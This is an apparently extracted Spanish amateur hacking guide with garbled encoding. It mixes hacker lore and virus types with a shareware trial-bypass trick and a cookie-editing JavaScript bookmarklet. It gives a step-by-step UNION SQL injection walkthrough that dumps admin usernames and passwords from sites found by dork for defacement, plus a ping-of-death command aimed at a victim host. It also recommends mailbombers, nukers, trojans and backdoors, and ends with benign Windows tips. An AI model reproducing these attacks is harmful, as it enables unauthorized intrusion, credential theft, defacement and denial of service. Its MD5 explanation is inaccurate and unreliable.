Está en la página 1de 6

Entonces que es un Hacker?. Si hacemos esta pregunta a alguien de la calle, probablemente conteste con un in sulto.

En nuestro pas este fenmeno no es bien conocido muy bien todava.Los verdaderos Hackers nunca come ntan nada de sus trabajos y si lo hacen, suelen utilizar apodos para no ser desc ubiertos. Si es un principiante, solo deseara recopilar informacin y lo copiara. Estos individuos se llaman LAMER y son rpidamente expulsados de los heroicos guer reros de la red. Existen al menos cinco tipos de Virus conocidos hasta ahora, esto no quiere deci r que estn todos, seguramente mientras escribo estas lneas habr surgido algn que otro engendro mas so fisticado. Pero bsicamente son estos : * Virus de arranque o Virus de Boot. * Virus de Macro. * Virus de ficheros. * Virus polimorficos. * Virus multiparte. El perfil del Hacker Un perfil idneo prcticamente no existe, pero si un acercamiento. El Hacker es algu ien compulsivo y obsesivo por acumular conocimientos. Es extrovertido e investiga todo lo relacio nado con la electrnica y la informtica. Es el tipo de personas que suelen abrir todos los aparatos de cons umo de casa o lee los ficheros de su ordenador hasta modificarlos para ver que sucede. Un buen Hacker se apunta lo aprendido y no lo difunde con una sonrisa de oreja a oreja, como un idiota. Se calla. Es mejor para poder proseguir. Si es cierto que al Hacker, le entusiasma todo lo que rodea la tecnologa, la tele fona celular, los ordenadores, las tarjetas de credito electrnicas o los Satlites. Normalmente lee demasiadas revistas y estudia pesados libros de tcnica Los gurus Son los maestros y ensean a los futuros Hackers. Normalmente se trata se personas adultas, me refiero adultas , porque la mayora de Hackers son personas jvenes, qu e tienen amplia experiencia sobre los sistemas informticos o electrnicos y estn de alguna forma hay, para ensear a o sacar de cualquier duda al joven iniciatico al tema. Es como una especie de profesor que tiene a sus espaldas unas cuantas medallitas que lo identifican como el mejor de su serie. El guru no esta activo, pero absorve conocimientos ya que sigue practicando, pero para conocimientos propios y solo ensea las tcnicas mas basicas. SON SEGURAS LAS PAGINAS WEB SOBRE HA CKING Algunas de ellas pueden resultar peligrosas e inseguras, pero no todas. Es cierto que las paginas sobre Hacking, pueden resultar una muy buena fuente de informacin para los novatos , per o existen algunas paginas, creadas por personas con vagas intenciones, que coloc an en ellas utilidades dainas como Virus o cookies ES SEGURO EL CORREO ELECTRNICO En absoluto, el correo electrnico no es nada seguro. A travs de el se pueden recibir ficheros pegados indeseables. Adems el correo electrnico puede ser interceptado y ledo por los Lamers, que emplea n Sniffers, programas capaces de interceptar correo electrnico entre otros. QUE H ERRAMIENTAS SON IMPRESCINDIBLES PARA EL HACKER El Hacker necesita herramientas que le faciliten el trabajo en la red. Entre estas herramientas destacan los sniffers, escaneadores y programador es de tarjetas inteligentes. Tambin se recomienda poseer algn Mailbombing y Nukenabber para enfrentarse a aquellos que solo actan por fastidiar . tambien un buen virus bajo la manga La ingeniera social es quizs la base de un Hacker, para obtener los datos o lo que

le interesa por medio de una conversacin y de personas El truco de Simply es hasta la fecha el mas sencillo y el mas elegante hasta la fecha. Este truco se puede hacer de forma manual o automtica, esto es, a travs de Software o Hardware. Hasta la fecha en que se estn escribiendo estas lneas, este t ruco ha conseguido burlar perfectamente cualquier tipo de contador DSS o similar, ya que se trata de congelar el tiempo del reloj fuera de los ficheros INI y no registrarlos. Dicho de otra manera, antes de arrancar el siste ma operativo hay que introducirse en la BIOS y modificar la fecha, guardando siempre relacin. Esto quiere decir que si se bloquea el da 5, el ordenador siempre deber registrar que esta en el da 5. Como se sabe, los contadores pueden d etectar cambios inferiores de fecha, pero no igualdades, y como hasta la fecha no se controla la hora y los minutos, el truco esta servido. Con este mtodo han cado todos los ltimos programas del mercado hasta la fecha, pala bra. Nota : No se pretende promocionar el truco Simply ni ninguno de los expuestos en este capitulo, de modo que quien lo ejecute quedara a responsabilidad suya el trequear el Shareware y de na da responde el autor o autores de esta obra, el empleo de este truco u otros des critos. Al no existir copia ni animo de lucro, no existe piratera. Queda dicho. ahora mostra remos algunas formas de encriptacion bastante utiles * MD5.....este algoritmo es ta desarrollado por el grupo RSA y es un intento de probar con otros sistemas cr iptogrficos que no empleen claves. El algoritmo desarrollado es capaz de obtener 128 bits a partir de un determinado texto. Como es lgico hasta el momento no se s abe cuales son las operaciones matemticas a seguir, pero hay alguien que dice que es mas que probable que se basen en fact ores de nmeros primos. postada no les digan a nadie pero son secuencias en primos en factor euler ahora esto les gustara Espiaremos una comunicacin primero sin usar ningn tipo de proteccin y despus con un cliente SSH. Primero dejam os nuestro sniffer escuchando todos los paquetes TCP nuestra propia red. Y nos l oggearemos a una cuenta de Messenger usando un servicio en lnea como ebbudy o la que gusten y analizaremos el trafico. Terminando de loggearnos checamos el Logg file que se crea al marcar la casilla de Enable Loggining , y busquemos entre sus e ntraas. Despus de buscar un rato en los paquetes TCP, nos encontramos con una lind a cookie que crea ebuddy al loggearnos. Como vern esta mi mail tan claro como el agua (el cual es falso jiji) y un lindo hash con la contrasea, que por lo menos a hora viajan en hash, en el primer Messenger que saco Yahoo no hacia ni eso Esto n o aclara el hecho que es importante que nadie pueda husmear en la campo data de nuestros paquetes, digo es como si mandaras cartas y cualquier cartero pervertid o pudiera ver lo que dice sin ningn inconveniente. Ahora hagamos lo mismo pero us aremos el putty para conectarnos a un servidor SMTP usando el Secure Shell Obser vando uno de los paquetes nos damos cuenta que el campo data no es comprensible ya que esta encriptado, lo cual pone mas difcil las cosas, dependiendo del client e/servidor la comunicacin estar encriptada en RSA de 64,128, 256 o hasta 1024bits XSS es un ataque basado en la explotacion de vulnerabilidades del sistema de validac ion de HTML incrustado Sucede cuando hay un mensaje o una ruta en la URL del nav egador o en una cookie. Para saber el contenido de una cookie, sin usar ningun t ipo de iecv o addin para tu navegador, puedes usar el siguiente script de jasild bg. Solo coloca TODO lo que esta en color negro en la barra de direcciones, y pr esiona Enter. Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la cookie se borrara. el uso de la libreria cURL un usuario malintencio nado, podria al recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante cuando quiera, pueda entrar como tu, sin siquiera necesitar tu c

ontrasea. Este codigo (muy peligroso) borra todo el contenido de la pagina en cue stion, y escribe otra cosa: javascript:for(var g in document.cookie.split (';'))void(prompt("Valor de cookie "+document.cookie.split (';')[g].split ( =')[0],document.cookie.split( ;')[g].split ( =')[1]));alert ( Cookies:n +document.cookie.replace(/;/, rn )); Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la cookie se borrara. el uso de la libreria cURL un usuario malintencionado, podria al recibir tu cookie, ent rar a la pagina, y dejarla en cache, para que el atacante cuando quiera, pueda e ntrar como tu, sin siquiera necesitar tu contrasea. Este codigo (muy peligroso) b orra todo el contenido de la pagina en cuestion, y escribe otra cosa: Qu es Deface? El Deface / Defacing / Defacement es la modificacin de una pgina web sin autorizac in del dueo de la misma. Primero hay que tener un buen dorks SQL, por ejemplo. alli nurl: .php?id= Sin las comillas. Ese Dork es el ms bsico pero hay muchsimos ms, todo es con tal de ir mirando. Bueno ya hemos encontrado una, www.web.com/noticia.ph p?id=34 Ahora para saber si es vulnerable, le tenemos que quitar el 34, y ponerl e . Quedara a si: www.web.com/noticias.php?id= Si nos sale un error mysql , tipo es te ; Warning: mysql_error(): supplied argument is not a valid MySQL-Link resourc e in /usr/home/xxxX/public_html/_sys/general_functions.php on line 5 Lo principa l es; -1+union+all+select+0,1 Quedara as ; www.web.com/noticias.php?id=-1+union+al l+select+0,1 Ara toca ir buscando, hasta que se te quite los errores, y te salga n nmeros. Para ir buscando tienes que ir aadiendo nmeros , ejemplo: www.web.com/not icias.php?id=-1+union+all+select+0,1,2,3,4,5,6,7-- Siempre al final de cada nume ro pon -- [Dos guiones] sin las comillas. No siempre acaba en 7, puede acabar en 1 00, 200, quien sabe. A m, me ha salido los nmeros en 7, y me ha tirado el 4, 6 y 7 . Ahora toca coger uno de ellos, el que sea, yo cojo el 4. Ara tenemos que hacer lo siguiente: Si as elegido el 4, borras el numero 4 y pones table_name sin las c omillas y al final pones; +from+information_schema.tables Y nos quedara a si: www. web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+infor mation_schema.tables Ahora se nos ha cambiado el 4 por CHARACTER_SETS. Que es lo que normal mente sale al principio. Ara nos toca buscar tablas como admin, root, login, miembro, member, user, usuario, administrador, etc. Y aviso, no es lo mis mo admin que Admin. Me explico, a lo mejor con admin no te sale y con Admin s. Pa ra buscar las tablas tienes que borrar los dos guiones finales y poner ; +1,1-Y ir cambiando el primer 1 por los siguientes nmeros, ejemplo: www.web.com/notici as.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema. tables+ 1,1-- www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_nam e,5,6,7+from+information_schema.tables+ 2,1-- www.web.com/noticias.php?id=- 1+un ion+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+ 3,1-- A si hasta que te salga algo importante. Nunca suele pasar de 100 pero bueno, nunc a se sabe. A m me ha tirado la tabla admin en 17. Ahora vamos hacer lo siguiente: Borras +information_schema.tables+3,1-- , quedara a si: www.web.com/noticias.ph p?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from y pones +admin , pones a dmin por que es la tabla importante que te ha tirado, quedara as: www.web.com/noti cias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+admin & ara en ta ble_name hay que ir probando palabras como; Login, admin, password, clave, pass, user, email, mail , etc... Quedara a si: www.web.com/noticias.php?id=- 1+union+al l+select+0,1,2,3,admin,5,6,7+from+admin A m el user me lo ha tirado en admin y la c ontrasea en clave . Ahora borras lo que has puesto en 4, y pones : concat(nombre,0x3 a3a,pass) Quedara a si: www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3, concat(admin,0x3a3a,clave),5,6,7+from+admin Os explico, admin es la tabla donde nos ha dado el usuario, 0x3a3a es :: en hexadecimal y clave es la tabla donde no s a tirado el password. Y Listo ya tenemos usuario y password. Ahora toca buscar el panel Ping De La Muerte. Esta tecnica no es propia de un Hacker ya que unica mente sirve para tirar un servidor o sea que se desconecta de Internet y esto pu ede representar grandes perdidas a una empresa. Con esto solo os quiero decir qu

e aunque aqui os lo explicare no es cuestion que lo useis por Internet atacando servidores. ping muy grande y producira su caida. Para ejecutar este ataque solo tenemos que escribir : c:>ping -l 65510 victima.com Whois. La utilidad Whois, al igual que Finger es muy comun en Unix y no esta disponible en Win95/98 pero comos somos asi de listos saldremos del apuro. Tambien sirve p ara pedir informacion de un servidor pero no el igual que Finger, ya que se dife rencian en el tipo de informacion, el finger se suele utilizar mucho para buscar direcciones de correo mientras que el Whois, para averiguar informacion sobre u n servidor en concreto. Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un host muy espe cial: c:>telnet whois.internic.net Por supuesto Internic, una empresa privada norte ameriacana que se encarga de co ntrolar los dominios de Internet, y podemos usar su base de datos para pedir inf ormacion sobre un servidor. Cuando conectemos a la base de datos de Internic, es cribimos "Whois nombre_ del_servidor" y nos sacara la informacion. Winipcfg. Ejecutando este comando, nos saldra una ventana windows informandonos de los dif erentes valores de nuestra red. Realmente util para verificar la configuracion. Encriptando Nuestro Correo. Conviene encriptar nuestro correo, sobre todo si esta relacionado con el hacking , ya que asi nadie podra saber que pone y acusarnos de nada. Siempre podemos ale gar "Privacidad en los Datos" . Al igual que antes hay varios paquetes de PGP pa ra mail. Sugerencias Para Un Mejor Hacking. Aqui hablare sobre algunas ideas que pueden potenciar el hacking en Win95/98 y l a creacion de nuevas herramientas. - Programas troyanos que capturen el password del acceso a Internet. - Programas para IP-Spoof. - Creacion de herramientas de redes para Win95/98. - Wardialers. - Programas para atacar otros Win95/98 (DoS). - Nuevas Suites. - Programas crackeadores del passwd. - Programas criptograficos. - Programas eliminadores de ficheros de forma segura. - Puertas traseras. Liberar memoria RAM Liberar memoria RAM. Tras haber ejecutado una o mltiples aplicaciones o juegos qu e hagan uso intensivo de los recursos del sistema, habremos detectado que Window s queda algo "tocado", mucho mas lento. Esto es debido a que los restos de las a plicaciones bloquean parte de la RAM que han utilizado, ocasionando lo que se ll ama "fragmentacin de memoria". Mediante un pequeo script podemos liberar esa memor ia , forzando al ordenador a descargar el contenido de la memoria al archivo de intercambio de forma que recargue de nuevo toda la informacin activa en la memori a y deseche la informacin no til, esto lo haremos de la siguiente forma: Abrimos el bloc de notas de Windows y dependiendo de la memoria de nuestro orden ador escribiremos los siguientes valores: Si tienes menos de 128 Mb de memoria RAM, escribes Mystring=(16000000) Si tienes 128 Mb de memoria RAM o ms escribes Mystring=(80000000) Ahora guarda este archivo en el lugar que quieras, con el nombre "liberar.vbe" ( no te olvides poner la extensin .vbe ya que el nombre no importa puedes poner el que quieras). Ahora hacemos doble clic sobre el archivo que acabamos de crear y windows refres car la memoria RAM. Mayor velocidad de acceso a los programas Aunque tu equipo disponga de suficient e memoria RAM y puedas trabajar con varios programas sin problemas el sistema si empre utiliza el Kernel para enviar y recibir archivos del archivo de paginacin d el disco duro, por este motivo la velocidad del ordenador se frena, si ya dispon es de memoria RAM suficiente sigue estos pasos:

Haz clic sobre el botn Inicio y a continuacin sobre Ejecutar, escribe regedit y pu lsa el botn Aceptar Ahora te desplazas por la siguiente cadena: HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Memory Manag ement Busca en el panel derecho la entrada DisablePagingExecutive y haz doble clic sob re ella. En la ventana que aparece cambia el valor de 0 y pones 1 luego pulsa el botn Acep tar y reinicia tu ordenador, ahora conseguirs mas velocidad de acceso a los progr amas porque utilizar menos el disco duro. Arrancar y Apagar mas rpido el PC Conseguirs rapidez en el arranque y apagado de tu ordenador, siguiendo los pasos que a continuacin te proponemos: Haz doble clic sobre "Mi PC" Entra en la unidad C Selecciona el men "Ver/Opciones" Selecciona la pestaa "Ver" Selecciona todos los "Archivos/Aplicar" Haz un clic so bre el botn derecho sobre el archivo MSDOS.SYS Despus, ves a "Propiedades" y elimi na la marca de "slo lectura y oculto/Aplicar" Selecciona el archivo y brelo con el bloc de notas Sobre "Opciones" ya slo tendrs que escribir BootDelay=0 Finalmente, ponle los atributos de "slo lectura y oculto". Eliminar archivos que no se dejan borrar Con frecuencia nos encontramos que al i ntentar borrar un archivo, XP nos contesta que no se puede eliminar porque el ar chivo est siendo usado por otro programa, este problema suele ocurrir cuando inte ntamos borrar archivos en formato *.avi. Normalmente el problema suele estar pro ducido porque algn avi est daado y el codec correspondiente (el cual se invoca siem pre en vista previa) se cuelga y no lo suelta. Recordad que AVI no es un tipo de fichero, sino que es un "contenedor" de format o de video, y que en la cabecera interna, lleva realmente grabado el tipo de vid eo que es y por tanto el sistema sabe a que codec debe llamar. Para solucionar este problema abriremos una ventana de comandos Hacemos clic en el botn inicio y luego sobre Ejecutar A continuacin escribimos cmd y pulsamos el b otn Aceptar Cerramos todos los programas que tengamos abiertos menos la pantalla de MS-DOS que acabamos de abrir. Volvemos ha hacer clic en el botn Inicio y luego sobre Ejecutar Escribimos Taskmgr.exe y pulsamos el botn Aceptar Volvemos a puls ar el botn Inicio y luego sobre Ejecutar Escribimos explorer.exe y pulsamos el botn Aceptar. Volvemos a la ventana de coma ndos e iremos a la carpeta donde tengamos el archivo que queremos eliminar y esc ribiremos: del dejamos un espacio y escribimos el nombre_archivo Volvemos de nuevo al administrador de tareas, Archivo > Nueva tarea y escribimos "explorer.exe" (sin comillas) para reestablecer el escritorio. Ya podemos cerra r el administrador de tareas y la ventana de comandos. Atajos del teclado en Windows Vista Alt + Tab = Combinacin para cambiar entre las distintas ventanas que tengamos abiertas. Ctrl + Alt + Tab = Hace lo mismo que Alt + Tab pero si soltamos las teclas no se cerrara la ventana. Ctrl + Alt + Supr = Abre una ventana desde la que podemos, bloquear el equipo, c ambiar de usuario, cerrar sesin, cambiar una contrasea e iniciar el administrador de tareas. Ctrl + Maysculas + Esc = Abre el administrador de tareas de Windows. Ctrl + Maysculas + Enter = Abre un programa como administrador. Win = Abre el men de inicio. Win + F1 = Abre la ayuda de Windows. Win + 1 = Lanza la primera aplicacin de la barra de inicio rpido, cambiando el num ero 1 por el numero 2 abrir la segunda aplicacin de la barra de inicio rpido y as su cesivamente con todas las aplicaciones que tengamos en el men. Win + Tab = Activa el Flip 3D con el que movernos entre las ventanas viendo una

vista previa. Cada pulsacin sobre Tab que hagamos (manteniendo Win pulsada) cambi ar a la siguiente ventana y al soltar, la ventana seleccionada se mostrar en el fr ente. Ctrl + Win + Tab = Mantiene el Flip 3D despus de liberar las teclas y podemos mov ernos entre las ventanas con las teclas de cursor. Win + Espacio = Trae al frente la barra lateral. Win + Pausa = Abre la seccin de Sistema del panel de control. Win + D = Muestra el escritorio, si volvemos a usarlo vuelve a su estado anterio r. Win + E = Abre el explorador de Windows. Win + F = Abre el dilogo de bsqueda. Win + G = Permite cambiar el foco entre los gadgets de la barra lateral. Win + L = Bloquea el equipo. Win + M = Minimizar todas las ventanas. Maysculas + Win + M = Permite restaurar todas las ventanas. Win + R = Abre el dilogo Ejecutar. Win + T = Pone el foco en la barra de tareas, con la versin minimizada de la vent ana activa seleccionada, mostrando la vista previa de la ventana. Podemos movern os entre las distintas ventanas pulsando de nuevo Win + T, o pulsando T sin solt ar Win, o con las teclas de cursor. Win + U = Centro de accesibilidad. Win + X = Centro de movilidad de Windows.

bueno espero les sirva y ojo otra ves solo es una fuente de informacion y educac ion y no me ago